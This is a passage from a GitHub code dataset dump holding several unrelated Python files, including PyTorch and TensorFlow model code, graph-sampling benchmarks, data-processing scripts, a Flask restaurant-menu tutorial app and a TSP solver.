\"gaussian\":\n self.wdist = torch.randn(self.n_wrd_cells, self.wdist_size).to(device)\n elif dist == \"uniform\":\n self.wdist = (torch.rand(self.n_wrd_cells, self.wdist_size)*2-1).to(device)\n else:\n self.wdist = torch.randn(self.n_wrd_cells, self.wdist_size).to(device)\n\n def transform(self, v, view_size=(16,16)):\n # Get Transform Location Code of World Cells\n wdist_tile = self.wdist.reshape(-1, self.n_wrd_cells, self.wdist_size).repeat(v.shape[0], 1, 1)\n v_tile = v.reshape(-1, 1, self.vsize).repeat(1, self.n_wrd_cells, 1)\n wdist_input = torch.cat((wdist_tile, v_tile), dim=2).reshape(self.n_wrd_cells*v.shape[0],-1)\n wcode = self.w2c(wdist_input)#.reshape(-1,self.n_wrd_cells,self.wcode_size)\n \n # Camera Space Embedding\n h = F.relu(self.fc1(wcode))\n h = F.relu(self.fc2(h))\n activation = torch.sigmoid(self.fc_act(h).view(-1, self.n_wrd_cells, 1))\n cs_embedding = self.fc_emb(h).view(-1, self.n_wrd_cells, self.emb_size)\n \n # View Space Embedding\n x = torch.linspace(-1, 1, view_size[0])\n y = torch.linspace(-1, 1, view_size[1])\n x_grid, y_grid = torch.meshgrid(x, y)\n vcode = torch.cat((torch.unsqueeze(x_grid, 0), torch.unsqueeze(y_grid, 0)), dim=0).reshape(2,-1).permute(1,0).to(device) #(16*16, 2)\n vs_embedding = self.vse(vcode) #(256, 128)\n vs_embedding = torch.unsqueeze(vs_embedding, 0).repeat(v.shape[0], 1, 1) #(-1, view_cell, emb_size)\n \n # Cross-Space Cell Relation\n relation = torch.bmm(cs_embedding, vs_embedding.permute(0,2,1)) #(-1, wrd_cell, view_cell)\n return relation, activation\n\n def forward(self, view_cell, v, view_size=(16,16)):\n relation, activation = self.transform(v, view_size=view_size)\n distribution = torch.softmax(relation, 2)\n route = distribution * activation # (-1, n_wrd_cells, n_view_cells)\n wrd_cell = torch.bmm(view_cell, route.permute(0,2,1))\n return wrd_cell # (-1, csize, n_wrd_cells)\n \n def query(self, wrd_cell, v, view_size=(16,16), steps=None, occlusion=True):\n relation, activation = self.transform(v, view_size=view_size)\n distribution = torch.softmax(relation, 1)\n route = distribution * activation # (-1, n_wrd_cells, n_view_cells)\n query_view_cell = torch.bmm(wrd_cell, route).reshape(-1, self.csize, view_size[0], view_size[1])\n return query_view_cell","repo_name":"jerrywiston/Spatial-Transformation-Routing-Generative-Query-Network","sub_path":"backup/strn_gaussian.py","file_name":"strn_gaussian.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37573424345","text":"import torch\nimport dgl\nfrom gs.utils import load_graph\nimport time\nimport numpy as np\nimport gs\nfrom gs.utils import SeedGenerator\nimport sys \nsys.path.append(\"..\") \nfrom ogb.nodeproppred import DglNodePropPredDataset\nimport argparse\nfrom dgl.dataloading import DataLoader, NeighborSampler\nimport tqdm\nimport scipy.sparse as sp\n\n# os.environ['CUDA_LAUNCH_BLOCKING'] = '1'\n\ndef load_ogbn_products():\n data = DglNodePropPredDataset(name=\"ogbn-products\",root=\"/home/ubuntu/data\")\n splitted_idx = data.get_idx_split()\n g, labels = data[0]\n g=g.long()\n feat = g.ndata['feat']\n labels = labels[:, 0]\n n_classes = len(\n torch.unique(labels[torch.logical_not(torch.isnan(labels))]))\n g.ndata.clear()\n # print(\"before:\",g)\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n # print(\"after:\",g)\n # sp.save_npz(\"/home/ubuntu/data/products_adj.npz\", g.adj(scipy_fmt='coo'))\n return g, feat, labels, n_classes, splitted_idx\n\ndef load_100Mpapers():\n train_id = torch.load(\"/home/ubuntu/data/papers100m_train_id.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n coo_matrix = sp.load_npz(\"/home/ubuntu/data/ogbn-papers100M_adj.npz\")\n # print(\"before:\",g)\n g = dgl.from_scipy(coo_matrix)\n \n # g = g.formats(\"csc\")\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n g=g.long()\n # print(g)\n # exit()\n return g, None, None, None, splitted_idx\n\ndef load_livejournal():\n train_id = torch.load(\"/home/ubuntu/data/livejournal_trainid.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n coo_matrix = sp.load_npz(\"/home/ubuntu/data/livejournal/livejournal_adj.npz\")\n\n g = dgl.from_scipy(coo_matrix)\n\n # g = g.formats(\"csc\")\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n # print(\"after:\",g)\n # sp.save_npz(\"/home/ubuntu/data/livejournal/livejournal_adj.npzcon\", g.adj(scipy_fmt='coo'))\n g=g.long()\n return g, None, None, None, splitted_idx\n\ndef load_friendster():\n train_id = torch.load(\"/home/ubuntu/data/friendster_trainid.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n bin_path = \"/home/ubuntu/data/friendster/friendster_adj.bin\"\n g_list, _ = dgl.load_graphs(bin_path)\n g = g_list[0]\n print(\"graph loaded\")\n # train_nid = torch.nonzero(g.ndata[\"train_mask\"], as_tuple=True)[0]\n # test_nid = torch.nonzero(g.ndata[\"test_mask\"], as_tuple=True)[0]\n # val_nid = torch.nonzero(g.ndata[\"val_mask\"], as_tuple=True)[0]\n\n # features = np.random.rand(g.num_nodes(), 128)\n # labels = np.random.randint(0, 3, size=g.num_nodes())\n # feat = torch.tensor(features, dtype=torch.float32)\n # labels = torch.tensor(labels, dtype=torch.int64)\n # n_classes = 3\n # csr_matrix = coo_matrix.tocsr()\n # sp.save_npz(\"/home/ubuntu/data/friendster/friendster_adj_csr.npz\",csr_matrix)\n # print(\"file saved!\")\n # g = dgl.from_scipy(coo_matrix)\n print(g.formats())\n # g = g.formats(\"csc\")\n g=g.long()\n return g, None,None,None,splitted_idx\n\ndef matrix_batch_sampler_deepwalk(A: gs.Matrix, seeds, num_steps):\n path = A._graph._CAPI_random_walk(seeds,num_steps)\n return path\n\n\n\ndef benchmark_w_o_relabel(args, matrix, nid):\n print('####################################################DGL deepwalk')\n # sampler = DeepWalkSampler(args.walk_length)\n print(\"train id size:\",len(nid))\n batch_size = args.big_batch\n seedloader = SeedGenerator(\n nid, batch_size=batch_size, shuffle=True, drop_last=False)\n # train_dataloader = DataLoader(g, train_nid, sampler,batch_size=config['batch_size'], use_prefetch_thread=False,\n # shuffle=False,drop_last=False, num_workers=config['num_workers'],device='cuda',use_uva=config['use_uva'])\n \n\n small_batch_size = args.batchsize\n\n #orig_seeds_ptr = torch.arange(num_batches + 1, dtype=torch.int64, device='cuda') * small_batch_size\n print(args.num_epoch, batch_size, small_batch_size)\n \n epoch_time = []\n mem_list = []\n torch.cuda.synchronize()\n static_memory = torch.cuda.memory_allocated()\n print('memory allocated before training:',\n static_memory / (1024 * 1024 * 1024), 'GB')\n for epoch in range(args.num_epoch):\n num_batches = int((batch_size + small_batch_size - 1) / small_batch_size)\n torch.cuda.reset_peak_memory_stats()\n torch.cuda.synchronize()\n start = time.time()\n for it, seeds in enumerate(tqdm.tqdm(seedloader)):\n seeds = seeds.to('cuda')\n # seeds_ptr = orig_seeds_ptr\n if it == len(seedloader) - 1:\n num_batches = int((seeds.numel() + small_batch_size - 1) / small_batch_size)\n paths = matrix_batch_sampler_deepwalk(matrix, seeds, args.walk_length)\n # print(\"paths:\",paths.shape,\"num_batches:\",num_batches)\n split_paths = torch.tensor_split(paths,num_batches)\n # print(len(split_paths))\n # print(split_paths[0].shape)\n # print(len(ptrts[0][0]),len(indts[0][0]))\n # print(len(ptrts[1][0]),len(indts[1][0]))\n\n torch.cuda.synchronize()\n epoch_time.append(time.time() - start)\n mem_list.append((torch.cuda.max_memory_allocated() -\n static_memory) / (1024 * 1024 * 1024))\n\n print(\"Epoch {:05d} | Epoch Sample Time {:.4f} s | GPU Mem Peak {:.4f} GB\"\n .format(epoch, epoch_time[-1], mem_list[-1]))\n\n # use the first epoch to warm up\n print('Average epoch sampling time:', np.mean(epoch_time[1:])*1000,\" ms\")\n print('Average epoch gpu mem peak:', np.mean(mem_list[1:]),\" GB\")\n print('####################################################END')\n\n # sample_list = []\n # static_memory = torch.cuda.memory_allocated()\n # print('memory allocated before training:',\n # static_memory / (1024 * 1024 * 1024), 'GB')\n # tic = time.time()\n # with tqdm.tqdm(train_dataloader) as tq:\n # for step, walks in enumerate(tq):\n # if step > 50:\n # break\n # torch.cuda.synchronize()\n # sampling_time=time.time()-tic\n # sample_list.append(sampling_time)\n # # print(sampling_time)\n # sampling_time = 0\n # torch.cuda.synchronize()\n # tic=time.time()\n \n # print('Average epoch sampling time:', np.mean(sample_list[2:]))\ndef load(dataset,args):\n device = args.device\n use_uva = args.use_uva\n g, features, labels, n_classes, splitted_idx = dataset\n sample_list = []\n static_memory = torch.cuda.memory_allocated()\n train_nid = splitted_idx['train']\n \n if args.data_type == 'int':\n g = g.int()\n train_nid = train_nid.int()\n # print(\"convect to csc\")\n # g = g.formats(\"csc\")\n # print(\"after convert to csc\")\n else:\n g = g.long()\n train_nid = train_nid.long()\n csc_indptr, csc_indices, edge_ids = g.adj_sparse('csc')\n # train_nid = train_nid.int()\n # csc_indptr = csc_indptr.int()\n # csc_indices = csc_indices.int()\n if use_uva and device == 'cpu':\n csc_indptr = csc_indptr.pin_memory()\n csc_indices = csc_indices.pin_memory()\n else:\n csc_indptr = csc_indptr.to('cuda')\n csc_indices = csc_indices.to('cuda')\n\n m = gs.Matrix(gs.Graph(False))\n m._graph._CAPI_load_csc(csc_indptr, csc_indices)\n print(\"Check load successfully:\", m._graph._CAPI_metadata(), '\\n')\n train_nid = train_nid.to('cuda')\n # csc_indptr, csc_indices, edge_ids = g.adj_sparse('csc')\n del g\n benchmark_w_o_relabel(args, m, train_nid)\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--device\", default='cuda', choices=['cuda', 'cpu'],\n help=\"Training model on gpu or cpu\")\n parser.add_argument('--use-uva', action=argparse.BooleanOptionalAction,\n help=\"Wether to use UVA to sample graph and load feature\")\n parser.add_argument(\"--dataset\", default='products', choices=['reddit', 'products', 'papers100m','friendster','livejournal'],\n help=\"which dataset to load for training\")\n parser.add_argument(\"--batchsize\", type=int, default=128,\n help=\"batch size for training\")\n parser.add_argument(\"--num-epoch\", type=int, default=3,\n help=\"numbers of epoch in training\")\n parser.add_argument(\"--data-type\", default='long', choices=['int', 'long'],\n help=\"data type\")\n parser.add_argument(\"--walk-length\", type=int, default=80,\n help=\"random walk walk length\")\n parser.add_argument(\"--big-batch\", type=int, default=1280,\n help=\"big batch\")\n args = parser.parse_args()\n print('Loading data')\n if args.dataset == 'products':\n dataset = load_ogbn_products()\n elif args.dataset == 'papers100m':\n dataset = load_100Mpapers()\n elif args.dataset == 'friendster':\n dataset = load_friendster()\n elif args.dataset == 'livejournal':\n dataset = load_livejournal()\n print(dataset[0])\n load(dataset,args)\n","repo_name":"Liu-rj/gs-experiments","sub_path":"main_exp_sampling/simple_algorithms/deepwalk/deepwalk_matrix.py","file_name":"deepwalk_matrix.py","file_ext":"py","file_size_in_byte":9155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73416159914","text":"import numpy as np \nimport math \nimport pandas as pd \nimport itertools\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\nfrom numpy import savetxt\nfrom celluloid import Camera\nimport time\nimport geopandas as gpd\n\ndatafile = 'data_for_choro.csv'\ndf = pd.read_csv(datafile)\ndf_test = pd.DataFrame(df[['a', 'b', 'c']].values)\n\ndf2 = pd.DataFrame(columns=list('abc'))\nfor i in range(4619):\n\tyear = 1896 + (4 * int(i/149))\n\tcountry = df_test[1][i]\n\tmedals = 0\n\tdf2 = df2.append({'a': year, 'b': country, 'c': medals}, ignore_index=True)\n\nprint(df2)\n\ntotals = []\n\nfor i in range(149):\n\ttotals.append(0)\n\nfor j in range(4619):\n\tcurr = j % 149\n\t#curr1 = int(j / 149)\n\t#year = 1896 + (4 * curr1)\n\tyear = df_test[0][j]\n\tcountry = df_test[1][j]\n\tnum1 = df_test[2][j]\n\n\tif(j>=149):\t\n\t\tdf2.loc[df2.a.isin([year]) & df2.b.isin([country]), 'c'] += (num1 + totals[curr])\n\telse:\n\t\tdf2.loc[df2.a.isin([year]) & df2.b.isin([country]), 'c'] += num1 \n\n\ttotals[curr] += num1\n\t\nprint(df2)\ndf2.to_csv(r'total_choro.csv', index=False)\n","repo_name":"GrahamHutchinso6275/Data-Vis-Module","sub_path":"grahamhutchinson_assignment3/get_total_choro.py","file_name":"get_total_choro.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23817420528","text":"# Environment variables\nimport os\nos.environ['something'] = 'something'\n\n\n# loops\nfor num in range(1,100,2):\n print(num)\n\n \n# Named tuple (More readable way of representing tuples - object like)\n# Regular way \npt1 = (1.0, 5.0)\npt2 = (2.5, 1.5)\nfrom math import sqrt\nline_length = sqrt((pt1[0]-pt2[0])**2 + (pt1[1]-pt2[1])**2)\n# Named tuple way\nfrom collections import namedtuple\nPoint = namedtuple('Point', 'x y')\npt1 = Point(1.0, 5.0)\npt2 = Point(2.5, 1.5)\nfrom math import sqrt\nline_length = sqrt((pt1.x-pt2.x)**2 + (pt1.y-pt2.y)**2)\n\n# A data class comes with basic functionality already implemented. \n# For instance, you can instantiate, print, \n# and compare data class instances straight out of the box\nfrom dataclass import dataclass\n@dataclass\nclass DataClassCard:\n rank: str\n suit: str\n\n","repo_name":"rsirimalla/scratchpad","sub_path":"python_ref.py","file_name":"python_ref.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27546659078","text":"import pyglet\n\nimport resources\n\nclass Title(pyglet.sprite.Sprite):\n def __init__(self, *args, **kwargs):\n super(Title, self).__init__(img=resources.crow_logo, x=760, y=40,\n *args, **kwargs)\n self.game_title = pyglet.text.Label(\"Poke\", font_size = 36,\n anchor_y=\"top\", x=40, y=560,\n color=(0,0,0,255))\n self.credits = pyglet.text.Label(\"A game by Lena LeRay\",\n x=40, y=485, color=(0,0,0,255))\n self.timer = 200","repo_name":"Crowbeak/LD26","sub_path":"game/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3058561408","text":"from os import system\n\nSTEPS = [\n {\n \"name\": \"Переключиться на первый этап\",\n # language=Bash\n \"cmd\": \"git checkout first-stage\",\n },\n {\n \"name\": \"Переключиться на второй этап\",\n # language=Bash\n \"cmd\": \"git checkout second-stage\",\n }\n]\n\nEXIT_COMMAND = {\n \"name\": \"Выйти\",\n # language=Bash\n \"cmd\": \"exit\"\n }\n\nanswer = \"-1\"\nwhile not (answer.isnumeric() and int(answer) in range(len(STEPS)+1)):\n print(\"Выберите команду:\")\n for i in range(len(STEPS)):\n print(\"%s: %s\" % (i+1, STEPS[i]['name']))\n\n print(\"0: %s\" % EXIT_COMMAND['name'])\n try:\n answer = input()\n except KeyboardInterrupt:\n answer = \"0\"\n break\n\n\nSTEPS.insert(0, EXIT_COMMAND)\n\nprint(\"Выполняем действие...\")\nsystem(STEPS[int(answer)][\"cmd\"])\n","repo_name":"jag-k/1000listnick-it","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27333664965","text":"import numpy as np\nimport tensorflow as tf\nfrom ..utils import *\nfrom . import DiscreteQBuilder, NetworkBuilder, DiscreteBellmanBuilder\n\nclass QNetGraph(object):\n def __init__(self, global_step):\n self._summaries = None\n self._global_step = global_step\n\n def set_summaries(self, summaries):\n self._summaries = summaries\n\n def set_value_network(self, input, output, scope):\n self._value_in = input\n self._value_out = output\n self._value_scope = scope\n\n def set_update(self, update):\n self._target_update = update\n\n def set_bellman_ops(self, bnet):\n self._bellman_chosen = bnet.action\n self._bellman_reward = bnet.reward\n self._bellman_next = bnet.state\n self._bellman_terminal = bnet.terminal\n self._bellman_targetQ = bnet.updated_q\n\n def set_training_ops(self, loss, train):\n self._train_loss = loss\n self._train_step = train\n\n def get_actions(self, state, session):\n # batchify state\n state = state[np.newaxis, :]\n return session.run([self._value_out], feed_dict={self._value_in:state})[0]\n\n def _train_feed(self, qs):\n actions = np.reshape(qs.action, (len(qs.action),))\n feed = {self._value_in: qs.current,\n self._bellman_next: qs.next,\n self._bellman_chosen: actions,\n self._bellman_reward: qs.reward,\n self._bellman_terminal: qs.terminal}\n return feed\n\n def train_step(self, qs, session, summary_writer=None):\n feed = self._train_feed(qs)\n if summary_writer is None:\n _, loss = session.run([self._train_step, self._train_loss], feed_dict = feed)\n else:\n _, loss, smr, step = session.run([self._train_step, self._train_loss, self._summaries, self._global_step], feed_dict = feed)\n summary_writer.add_summary(smr, step)\n return loss\n\n def update_target(self, session):\n session.run(self._target_update)\n\nclass QNet(NetworkBuilder):\n def __init__(self, state_size, history_length, num_actions, arch, \n double_q=False, dueling=False):\n super(QNet, self).__init__(state_size = state_size, history_length = history_length, num_actions = num_actions)\n\n self._double_q = double_q\n self._dueling_arch = dueling\n self._q_builder = DiscreteQBuilder(state_size, history_length, num_actions, arch, dueling = dueling)\n\n def _build(self, optimizer, inputs=None):\n gstep = tf.Variable(0, dtype=tf.int64, trainable=False, name=\"global_step\")\n discount = tf.Variable(0.99, dtype=tf.float32, trainable=False, name='discount')\n chosen = tf.placeholder(tf.int32,[None], name=\"action\")\n \n # grouping these so the graph visualization looks nicer\n with tf.name_scope(\"transition\"):\n reward = tf.placeholder(tf.float32, [None], name=\"reward\")\n terminal = tf.placeholder(tf.bool, [None], name=\"terminal\")\n nstate = self.make_state_input(name=\"next_state\")\n\n self._qnet = QNetGraph(gstep)\n\n state = self.make_state_input()\n v = self._q_builder.build(name_scope=\"qnet\", var_scope=\"qnet\", inputs={\"state\": state})\n self._qnet.set_value_network(input = v.state, output = v.q_values, scope = v.scope)\n self._summaries += v.summaries\n\n target_scope = copy_variables_to_scope(v.scope, \"target_vars\")\n with tf.name_scope(target_scope.name+\"/\"):\n update = assign_from_scope(v.scope, target_scope, \"update\")\n \n self._qnet.set_update(update)\n\n bb = DiscreteBellmanBuilder(history_length = self.history_length, state_size = self.state_size, \n num_actions = self.num_actions, double_q = self._double_q)\n inputs = {\"discount\": discount, \"reward\": reward, \"terminal\": terminal, \"action\": chosen,\n \"next_state\": nstate, \"state\": state}\n b = bb.build(qbuilder = self._q_builder, value_scope = v.scope, \n target_scope = target_scope, inputs = inputs)\n self._summaries += b.summaries\n self._qnet.set_bellman_ops(b)\n\n with tf.name_scope(\"current_Q\"):\n current_q = choose_from_array(v.q_values, chosen)\n self._summaries.append(tf.summary.scalar(\"mean_Q\", tf.reduce_mean(current_q)))\n\n self._build_training(optimizer, current_q, b.updated_q)\n self._qnet.set_summaries(tf.summary.merge(self._summaries))\n self._summaries = []\n\n return self._qnet\n\n\n def _build_training(self, optimizer, current_q, target_q):\n with tf.variable_scope(\"training\"):\n num_samples = tf.shape(current_q)[0]\n loss = tf.losses.mean_squared_error(current_q, tf.stop_gradient(target_q), scope='loss')\n # error clipping\n with tf.name_scope(\"clipped_error_gradient\"):\n bound = 1.0/tf.to_float(num_samples)\n q_error = tf.clip_by_value(tf.gradients(loss, [current_q])[0], -bound, bound)\n\n # get all further gradients\n tvars = tf.trainable_variables()\n tgrads = tf.gradients(current_q, tvars, q_error)\n grads_and_vars = zip(tgrads, tvars)\n\n self._summaries.append(tf.summary.scalar(\"loss\", loss))\n train = optimizer.apply_gradients(grads_and_vars, global_step=self._qnet._global_step)\n \n self._qnet.set_training_ops(loss = loss, train = train)\n return self._qnet\n","repo_name":"ngc92/neural-control","sub_path":"deepq/deepq/controllers/networks/qnet.py","file_name":"qnet.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40669229498","text":"# # ETL - Extract, Transform and Load of Barzinga data\nimport pandas as pd\nimport json\n\ndf = pd.read_json('data/barzinga_labeled_products.json')\ndf.count()\n\nproducts = []\nfor i in df.index:\n product = {\n 'id': str(df['id'][i]),\n 'description': df['description'][i],\n 'label': i\n }\n products.append(product)\n\nwith open('data/products_dict.json', 'w') as f:\n json.dump(products, f)\n","repo_name":"gabibatista/barzingaML","sub_path":"products_data_processing.py","file_name":"products_data_processing.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25992500908","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\n \napp = Flask(__name__)\n\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n \nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n#Making API endpoints (GET request)\n@app.route('/restaurants/JSON')\ndef restaurantJSON():\n restaurants = session.query(Restaurant)\n return jsonify(Restaurant=[i.serialize for i in restaurants])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenusJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant.id)\n return jsonify(MenuItems=[i.serialize for i in items])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef menuJSON(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n return jsonify(MenuItems=menu.serialize)\n\n@app.route('/')\n@app.route('/restaurants/<int:restaurant_id>/')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant.id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n\n@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id)\n session.add(newItem)\n session.commit()\n flash(\"new menu item created!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n\n\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n if len(request.form['name'].strip()) > 1:\n menu.name = request.form['name']\n if len(request.form['description'].strip()) > 1:\n menu.description = request.form['description']\n if len(request.form['price'].strip()) > 1:\n menu.price = request.form['price']\n if len(request.form['course'].strip()) > 1:\n menu.course = request.form['course']\n session.add(menu)\n session.commit()\n flash(\"menu item edited!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu=menu)\n\n\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n session.delete(menu)\n session.commit()\n flash(\"menu item deleted!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', restaurant_id = restaurant_id, item=menu)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=5000)","repo_name":"VioletaCalvo/udacity-fullstack","sub_path":"P3_item_catalog/vagrant/exercises/full-stack-foundations/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11014322671","text":"import xml.etree.ElementTree as et\nimport base64\nfrom optparse import OptionParser\n\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"-l\", \"--lvbitxfile\", dest=\"lvbitxfile\",\n help=\"donor labview fpga bitfile\", metavar=\"LVBITXFILE\")\n\n parser.add_option(\"-b\", \"--bitfile\", dest=\"bitfile\",\n help=\"xilinx generated bitfile\", metavar=\"BITFILE\")\n\n parser.add_option(\"-o\", \"--output\", dest=\"outfile\",\n help=\"output labview fpga bitfile\", metavar=\"OUTFILE\")\n\n parser.add_option(\"-s\", \"--signature\", dest=\"signature\",\n help=\"output labview fpga bitfile signature\", metavar=\"SIGNATURE\",\n default=\"ABCDEFG\")\n\n\n (options, args) = parser.parse_args()\n\n tree = et.parse(options.lvbitxfile)\n root = tree.getroot()\n bs = root.find('Bitstream')\n if bs is None: return\n\n print('Found \"%s\" tag in \"%s\"...' % (bs.tag, options.lvbitxfile))\n\n print('Writing old bitfile content to \"%s\"...' % (options.bitfile+'.bak'))\n f_old = open(options.bitfile+'.bak', 'w')\n f_old.write(base64.b64decode(bs.text))\n f_old.close()\n\n\n print('Reading new bitfile \"%s\"...' % options.bitfile)\n f = open(options.bitfile, 'r')\n newbs = base64.b64encode(f.read())\n f.close()\n\n\n bs.text = newbs\n print('Saving new labview bitfile to \"%s\"...' % options.outfile)\n tree.write(options.outfile, xml_declaration=True, encoding='utf-8')\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","repo_name":"WindyCitySDR/uhd-e300-dev","sub_path":"fpga/usrp3/top/python/make_lvbitx.py","file_name":"make_lvbitx.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15503738811","text":"#\n# DDS Mini Project Interface\n# Name: Blessy Hadassa Konedana\n#\n\n\nfrom pymongo import MongoClient\nimport math\nimport os\nimport sys\nimport json\n\ndef DistanceFunction(lat2, long2, lat1, long1): #defining a function to calculate distance using latitude and longitude\n R=3959\n x2 = math.radians(lat2)\n x1 = math.radians(lat1)\n diff_x = math.radians(lat2-lat1)\n diff_y = math.radians(long2-long1)\n a = math.sin(diff_x/2) * math.sin(diff_x/2) + math.cos(x2) * math.cos(x1) * math.sin(diff_y/2) * math.sin(diff_y/2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n d = R * c\n return d\n\ndef FindBusinessBasedOnCity(cityToSearch, saveLocation1, collection): \n BusinessOnCity =open(saveLocation1, 'w')\t\t\t\t# opening saved location1\n result = []\t\n for i in collection.find({'city':cityToSearch.capitalize()}):\n \t# city search\n\t value = i['name']+\"$\"+i['full_address'].replace('\\n',',')+\"$\"+i['city']+\"$\"+i['state'] # Storing it in given format\n\t result.append(value)\t\t\t\t# Storing it in results\n for i in result:\n\t BusinessOnCity.write(i.upper()+\"\\n\")\t# writing the output file\n BusinessOnCity.close()\n\ndef FindBusinessBasedOnLocation(categoriesToSearch, myLocation, maxDistance, saveLocation2, collection):\n BusinessOnLocation = open(saveLocation2, \"w\") # opening saved location2\n lat1 = float(myLocation[0])\n long1 = float(myLocation[1])\n\n for business in collection.find(): \n categories = business['categories'] # storing all the categories of businesss\n if not set(categories).isdisjoint(categoriesToSearch): \n lat2 = float(business['latitude'])\n long2 = float(business['longitude'])\n dist = DistanceFunction(lat1, long1, lat2, long2) # finding the distance using predefined function\n if dist <= maxDistance:\n BusinessOnLocation.write(\"{}\\n\".format(business['name'].upper())) # writing the output file \n BusinessOnLocation.close()\n\n","repo_name":"Kbhadassah777/MongoDB_Search","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22839247756","text":"import sys\nsys.stdin = open('Python\\\\25th\\\\input','r')\ninput = sys.stdin.readline\nN = int(input())\nW = [list(map(int,input().split())) for _ in range(N)]\nINF = float('inf')\n\ndp = [[0 for i in range(1<<N)] for j in range(N)]\n\ndef TSP(n,s,v): # {v} 에서 도시 n에서 출발도시(s)로 돌아오는 최소비용경로\n if dp[n][v] :\n return dp[n][v] # 찾아놓은 DP 값 활용\n \n if v == (1<<N)-1: # 모든 도시를 방문 했는데, \n if W[n][s] > 0: # 거기서 다시 최초 위치로 돌아올수 있다면,\n return W[n][s] # 그 때 비용 반환\n return INF # 아니면 무한대 반환\n\n\n min_cost = INF\n for i in range(N): # 없다면 찾는다.\n if W[n][i] == 0:\n continue\n if (1<<i) & v :\n continue\n # 갈수 없거나, 이미 방문한 지역을 제외하고\n min_cost = min(min_cost,W[n][i] + TSP(i,s,v|(1<<i)))\n # 현재 도시에서 다음 도시로 간 뒤 출발 도시로 돌아가는 최소비용들 중 최소비용을\n # 현재 도시에서 출발 도시로 돌아가는 최소비용으로 저장한다.\n dp[n][v] = min_cost\n return dp[n][v]\n\nprint(TSP(N//2,N//2,1<<N//2)) # 아무곳에서 출발해도 되므로 가운데쯤에서 출발해보자","repo_name":"code-enig/Python","sub_path":"25th/외판원순회2통과.py","file_name":"외판원순회2통과.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23556205382","text":"\nfrom flask import Flask,render_template,request,redirect,url_for,session,g\n\nfrom models import mysl_pool_connection,logger\nlogger=logger()\nfrom student import student\nfrom auth import auth\nfrom admin import admin\nfrom flask import Flask\nfrom functools import 